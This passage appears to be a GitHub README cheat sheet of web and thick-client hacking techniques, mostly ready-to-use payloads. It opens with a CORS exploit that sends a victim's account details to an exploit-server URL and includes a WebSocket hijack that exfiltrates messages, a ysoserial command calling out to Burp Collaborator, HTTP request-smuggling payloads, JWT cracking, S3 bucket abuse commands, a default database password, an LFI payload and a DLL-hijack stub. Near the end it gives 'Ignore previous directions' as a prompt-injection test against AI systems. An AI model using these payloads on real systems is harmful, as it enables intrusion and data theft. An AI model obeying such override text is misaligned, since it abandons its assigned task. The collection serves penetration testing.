  document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req. req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

Tools

  • Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations

Clickjacking

Classic PoC

<style>
  iframe {
    position:relative;
    width:$width_value;
    height: $height_value;
    opacity: $opacity;
    z-index: 2;
  }
  div {
    position:absolute;
    top:$top_value;
    left:$side_value;
    z-index: 1;
  }
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>

Classic PoC + XSS

<style>
  iframe {
    position:relative;
    width:$width_value;
    height: $height_value;
    opacity: $opacity;
    z-index: 2;
  }
  div {
    position:absolute;
    top:$top_value;
    left:$side_value;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="$url?name=<img src=1 >"></iframe>

DOM-based vulnerabilities

Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.

  • document.URL
  • document.documentURI
  • document.URLUnencoded
  • document.baseURI
  • location
  • document.cookie
  • document.referrer
  • window.name
  • history.pushState
  • history.replaceState
  • localStorage
  • sessionStorage
  • IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
  • Database
DOM-based vulnerability Example sink
DOM XSS document.write()
Open redirection window.location
Cookie manipulation document.cookie
JavaScript injection eval()
Document-domain manipulation document.domain
WebSocket-URL poisoning WebSocket()
Link manipulation someElement.src
Web-message manipulation postMessage()
Ajax request-header manipulation setRequestHeader()
Local file-path manipulation FileReader.readAsText()
Client-side SQL injection ExecuteSql()
HTML5-storage manipulation sessionStorage.setItem()
Client-side XPath injection document.evaluate()
Client-side JSON injection JSON.parse()
DOM-data manipulation someElement.setAttribute()
Denial of service RegExp()

WebSockets

Any web security vulnerability might arise in relation to WebSockets:

  • User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
  • Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
  • If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.

Cross-site WebSocket hijacking (CSRF missing)

<script>
  websocket = new WebSocket('wss://websocket-URL');
  websocket.onopen = start;
  websocket.onmessage = handleReply;
  function start(event) {
    websocket.send("READY");
  }
  function handleReply(event) {
    fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
  }
</script>

Insecure deserialization

How to spot Insecure deserialization

  • PHP example O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}
  • Java objects always begin with the same bytes
    • Hex ac ed
    • Base64 rO0

Ysoserial

Because of Runtime.exec(), ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo before the multiple commands that we need to run. Here I needed to run the command host and whoami:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

Burp extensions

Server-side template injection

  • Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as ${{<%[%'"}}%\. To identify the template engine submit invalid syntax to cause an error message.
  • The next step is look for the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.
  • Use payloads like these 
    {{7*7}}[[3*3]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
${7*7}
${{7*7}}
@(7+7)
#{7*7}
#{ 7 * 7 }

Web cache poisoning

Constructing a web cache poisoning attack

  1. Identify and evaluate unkeyed inputs
  2. Elicit a harmful response from the back-end server
  3. Get the response cached

Cache key flaws Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:

  • Excluding the query string
  • Filtering out specific query parameters
  • Normalizing input in keyed components

Cache probing methodology

  1. Identify a suitable cache oracle
    • Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
  2. Probe key handling
    • Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
  3. Identify an exploitable gadget
    • These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.

HTTP Host header attacks

  • "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
  • Carriage Return Line Feed (CRLF) injection: "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]

HTTP request smuggling

Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:

  • Content-Length 
    POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
q=smuggling
  • Transfer-Encoding 
    POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
b
q=smuggling
0

Example

POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

Result: GPOST request

  • Some servers do not support the Transfer-Encoding header in requests;
  • Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.

Ways to obfuscate the Transfer-Encoding header

  • Transfer-Encoding: xchunked
  • Transfer-Encoding : chunked
  • Transfer-Encoding: chunked
  • Transfer-Encoding: x
  • Transfer-Encoding:[tab]chunked
  • [space]Transfer-Encoding: chunked
  • X: X[\n]Transfer-Encoding: chunked
  • Transfer-Encoding
: chunked

Confirming CL.TE vulnerabilities using differential responses

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

Result

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

Impact

  • Bypass front-end security controls
  • Revealing front-end request rewriting
  • Capturing other users' requests
  • Using HTTP request smuggling to exploit reflected XSS
  • Turn an on-site redirect into an open redirect
    Example of 301 in Apache and IIS web servers 
    GET /home HTTP/1.1
Host: normal-website.com
HTTP/1.1 301 Moved Permanently
Location: https://normal-website.com/home/
    Vulnerable request 
    POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 54
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
    Result 
    GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /scripts/include.js HTTP/1.1
Host: vulnerable-website.com
HTTP/1.1 301 Moved Permanently
Location: https://attacker-website.com/home/
  • Perform web cache poisoning
  • Perform web cache deception

Resource

JWT Attacks

A JWT consists of a header, a payload, and a signature. Each part is separated by a dot.

Common attacks

  • Accepting tokens with no signature
  • Brute-forcing secret keys using hashcat
    • You need a valid JWT and a wordlist
    • hashcat -a 0 -m 16500 <jwt> <wordlist>
    • If any of the signatures match, hashcat will give you an output like this <jwt>:<identified-secret> along with other details
    • Once identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See Signing JWTs
  • Injecting self-signed JWTs via the jwk, jku or kid parameter
  • Change Content-Type in cty to achieve XXE and deserialization attacks
  • x5c (X.509 Certificate Chain) can lead to CVE-2017-2800 and CVE-2018-2633
  • JWT algorithm confusion

Resources

OAuth authentication

How OAuth 2.0 works:

  • Client application The website or web application that wants to access the user's data;
  • Resource owner The user whose data the client application wants to access;
  • OAuth service provider The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.

OAuth flow

oauth-flow

Following standard endpoints:

  • /.well-known/oauth-authorization-server
  • /.well-known/openid-configuration

Vulnerabilities in the client application

  • Improper implementation of the implicit grant type
  • Flawed CSRF protection

Vulnerabilities in the OAuth service

  • Leaking authorization codes and access tokens
  • Flawed scope validation
  • Unverified user registration

Abusing S3 Bucket Permissions

Target example: http://[name_of_bucket].s3.amazonaws.com

Read Permission

  • aws s3 ls s3://[name_of_bucket] --no-sign-request
  • aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize

Write Permission

  • aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request

READ_ACP

  • aws s3api get-bucket-acl --bucket [bucketname] --no-sign
  • aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

WRITE_ACP

  • aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
  • aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request

Tools

Resources

Google Cloud Storage bucket

Tools

Resources

GraphQL

To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.

GraphQL Introspection query

{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n  __schema {\n    queryType {\n      name\n    }\n    mutationType {\n      name\n    }\n    subscriptionType {\n      name\n    }\n    types {\n      ...FullType\n    }\n    directives {\n      name\n      description\n      locations\n      args {\n        ...InputValue\n      }\n    }\n  }\n}\n\nfragment FullType on __Type {\n  kind\n  name\n  description\n  fields(includeDeprecated: true) {\n    name\n    description\n    args {\n      ...InputValue\n    }\n    type {\n      ...TypeRef\n    }\n    isDeprecated\n    deprecationReason\n  }\n  inputFields {\n    ...InputValue\n  }\n  interfaces {\n    ...TypeRef\n  }\n  enumValues(includeDeprecated: true) {\n    name\n    description\n    isDeprecated\n    deprecationReason\n  }\n  possibleTypes {\n    ...TypeRef\n  }\n}\n\nfragment InputValue on __InputValue {\n  name\n  description\n  type {\n    ...TypeRef\n  }\n  defaultValue\n}\n\nfragment TypeRef on __Type {\n  kind\n  name\n  ofType {\n    kind\n    name\n    ofType {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n"}

WordPress

  • Information Disclosure [high]: /_wpeprivate/config.json
  • Data exposure:
    • /wp-json/wp/v2/users/
    • /wp-json/th/v1/user_generation
    • /?rest_route=/wp/v2/users
  • xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this: 
    <?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
  • Use Nuclei to detect WordPress websites from a list of targets with: nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
  • Scan with WPScan github.com/wpscanteam/wpscan with: wpscan --url <domain> --api-token <your-api-token>
  • Nuclei templates %USERPROFILE%\nuclei-templates\vulnerabilities\wordpress\advanced-access-manager-lfi.yaml

Resources

IIS - Internet Information Services

  • Check if trace.axd is enabled
  • Search for 
    Views/web.config
bin/WebApplication1.dll
System.Web.Mvc.dll
System.Web.Mvc.Ajax.dll
System.Web.Mvc.Html.dll
System.Web.Optimization.dll
System.Web.Routing.dll
  • Other common files

Resources

Lotus Domino

Git source code exposure

Once you have the source code, look for the secrets within the files. To find secrets, you can use trufflehog.

Other tools

  • DotGit find if a website has .git exposed
  • nuclei template %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
  • GitDumper from GitTools

Subdomain takeover

Tools

4** Bypass

  • byp4xx, s/o to m0pam for the tip
  • Search for subdomain with subfinder. Httpx filters subdomains with a 403 response and prints their cname. Test the cname for a bypass subfinder -d atg.se — silent | httpx -sc -mc 403 -cname, s/o to drak3hft7 for the tip
  • 403 Bypasser Burp extension, test 403 bypasses on the run
  • Replace HTTP/n with HTTP/1.1, HTTP/2 or HTTP/3
  • Change the request from GET to POST or viceversa

Application level Denial of Service

  • If the application gives the possibility to download data, try to download too much data
    • If there are restrictions, try to bypass
  • In file uploads, try to upload huge files
  • In chat section, try to send big messages and see how the application behaves
  • Regular expression Denial of Service - ReDoS
  • Long Password DoS Attack (Note: the value of password is hashed and then stored in Databases)
    • Check for length restriction and play with it
    • If there is no restriction, test until the application slows down
    • password.txt
  • Long string DoS
  • DoS against a victim
    • Sending a reset link might disable an user's account, spam to prevent the user from accessing their account
    • Multiple wrong passwords might disable an user's account

Thick client vulnerabilities

DLL Hijacking

Tool

  • Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking

Using Process Monitor, add these the filters to find missing dlls.

procmon-config

After that, insert the dll in the position of the missing ones with the same name. An example of a dll:

#include <windows.h>

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason)
    
B85D
{
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL,
            "success!!",
            "pwned",
            MB_ICONERROR | MB_OK
        );
        break;
    }

    return TRUE;
}

Resources

Insecure application design

The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.

The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such TLS, HTTPS, etc.), and preferebli with Certificate Pinning.

If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.

Weak Hashing Algorithms

Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such MD5 and RC4, are known to be insecure and are not advised for use.

When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, it is recommended to utilize contemporary hashing algorithms that have been created especially for securely saving passwords when managing passwords. This indicates that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that can be configured by changing the work factor (e.g., PBKDF2 or Bcrypt)

If not configured correctly, the encryption can be not sufficiently secure. An example with AES, an algorithm for symmetric encryption:

  • Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. If implemented, it can weakens AES encryption.

Cleartext secrets in memory

The memory analysis of an application, done when the thick client process is running, can highlight the presence of secrets in cleartext and that can be therefore extracted by any user having access to the machine where the application is hosted.

Resource

  • Process Hacker It helps to dump the exe memory and see what sensitive data is there

Hardcoded secrets

Sometimes, the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and api keys.

Resources

Unsigned binaries

If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible replace it with a tampered version without the user noticing.

Resource

  • Sigcheck check the signature of an executable

Lack of verification of the server certificate

Due to the fact that the client does not verify the TLS certificate presented by the back-end, it's possible to intercept also HTTPS communications managed by the thick client application.

Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.

Insecure SSL/TLS configuration

During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.

Resource

  • testssl.sh useful for checking outdated ciphers & more

Remote Code Execution via Citrix Escape

If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:

  • Try to upload a PowerShell
  • Search for a functionality that opens a dialog box. Insert the path for cmd and PowerShell and see if they pop-up
  • In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a .bat and running it or upload files
  • Upload Process Hacker and see if you find Cleartext secrets in memory

Resources

Direct database access

  • If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
  • If the SQL server requires a Windows User access, use the command runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO>
  • Try access with the account sa:RPSsql12345
  • Intercept the requests and see if there is an Insecure application design. In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution

Resources

Insecure Windows Service permissions

Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.

Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the following time the service is launched. This can lead to privilege escalation depending on the user the service is running as.

Code injection

  • Check for classic HTML injections and XSS
    • Try to use a SSID as a vector for an XSS with a payload like "/><img src=x >
  • Check if <webview> works. If it does, it's might be possible to achieve a LFI with a payload like this <webview src="file:///etc/passwd"></webview>. [Reference]

Windows persistence

Resources

Artificial intelligence vulnerabilities

Prompt Injection

Prompt Injection is when an AI that follows textual instructions (a "prompt") to complete a job gets deceived by hostile, adversarial human input to do a task that was not its original goal. To test it, inject the text Ignore previous directions.

Some examples:

About

Here I gather all the resources about hacking that I find interesting

Resources

Readme

License

GPL-3.0 license
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Ruby 87.5%
  • PHP 6.3%
  • Python 2.6%
  • HTML 1.8%
  • Classic ASP 1.7%
  • JavaScript 0.1%
0